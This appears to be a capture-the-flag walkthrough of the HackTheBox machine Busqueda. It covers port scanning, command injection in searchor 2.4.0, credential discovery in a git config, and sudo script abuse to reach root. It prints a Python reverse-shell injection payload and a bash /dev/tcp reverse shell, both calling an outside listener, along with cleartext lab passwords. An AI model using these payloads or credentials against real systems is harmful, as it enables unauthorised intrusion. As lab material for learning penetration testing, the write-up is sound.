Busqueda (Docker information gathering)

10.10.11.208

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo "10.10.11.208 searcher.htb" >> /etc/hosts

http://searcher.htb/

gobuster dir -u http://searcher.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k

What is Flask?

Flask is a Python-based web framework.

searchor 2.4.0

https://security.snyk.io/package/pip/searchor/2.4.0

https://github.com/jonnyzar/POC-Searchor-2.4.2/blob/main/README.md

This version is vulnerable to arbitrary command execution.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.6',9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#


python3 -c 'import pty;pty.spawn("/bin/bash")'

Preparing for privilege escalation

cd /home/kali/Desktop/htb/10.10.11.208

cp /pentest/priv/PEASS-ng/linPEAS/linpeas.sh .

python3 -m http.server 80

(run in the obtained shell) cd /tmp;wget http://10.10.14.6/linpeas.sh;chmod +x linpeas.sh;./linpeas.sh > out.txt

Information gathering: /var/www/app/app.py

cat /etc/hosts

echo 10.10.11.208 gitea.searcher.htb >> /etc/hosts

A new site is discovered:

http://gitea.searcher.htb/

find / -name "config" 2>/dev/null

cat /var/www/app/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main

Trying this password for a login shows that jh1usoih2bkjaspwe92 is the correct password for the svc user.
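The .git/config recovered above leaks a Gitea credential inside the remote URL. As an added example that is not part of the original writeup, the Python check below parses a git config, flags every remote whose URL embeds user:password, and produces a redacted URL a defender could safely log; the sample config is constructed from the one shown above.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: the .git/config from the writeup above, with the
# embedded credential left in so the check has something to find.
SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
\tremote = origin
\tmerge = refs/heads/main
"""

# Matches [section] and [section "subsection"] headers of git's INI-like format.
_SECTION = re.compile(r'^\[(\w+)(?:\s+"([^"]*)")?\]$')

def parse_git_config(text):
    """Minimal git-config parser: returns {(section, subsection): {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;':
            continue
        m = _SECTION.match(line)
        if m:
            current = sections.setdefault((m.group(1), m.group(2)), {})
        elif '=' in line and current is not None:
            key, value = line.split('=', 1)
            current[key.strip().lower()] = value.strip()
    return sections

def find_embedded_credentials(text):
    """One finding per remote whose URL carries userinfo, with the secret stripped."""
    findings = []
    for (section, name), keys in parse_git_config(text).items():
        if section != 'remote' or 'url' not in keys:
            continue
        parts = urlsplit(keys['url'])
        if parts.username is None and parts.password is None:
            continue  # no user:password in this URL (also skips scp-style git@host:path)
        host = parts.hostname or ''
        if parts.port:
            host = f'{host}:{parts.port}'
        redacted = urlunsplit((parts.scheme, host, parts.path, parts.query, parts.fragment))
        findings.append({'remote': name, 'username': parts.username,
                         'has_password': parts.password is not None, 'redacted_url': redacted})
    return findings
```

Run it over every `.git/config` found with the `find` command above; any finding means a credential is sitting on disk in a file that is usually readable by the web server account.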

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea

Information gathering: the privilege-escalation script is found.

Log in with the credentials found at http://gitea.searcher.htb/user/login:

administrator
yuiu1hoiu4i5ho1uh

Looking at the administrator user's scripts, full-checkup.sh can be used for privilege escalation.
The reason is that this user can run system-checkup.py as root, and that script in turn runs full-checkup.sh.
So, using the relative-path technique, forge a full-checkup.sh that spawns a reverse shell.

User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *

cd /tmp

echo \#\!/bin/bash > full-checkup.sh
echo "bash -i >& /dev/tcp/10.10.14.6/4444 0>&1 " >> full-checkup.sh
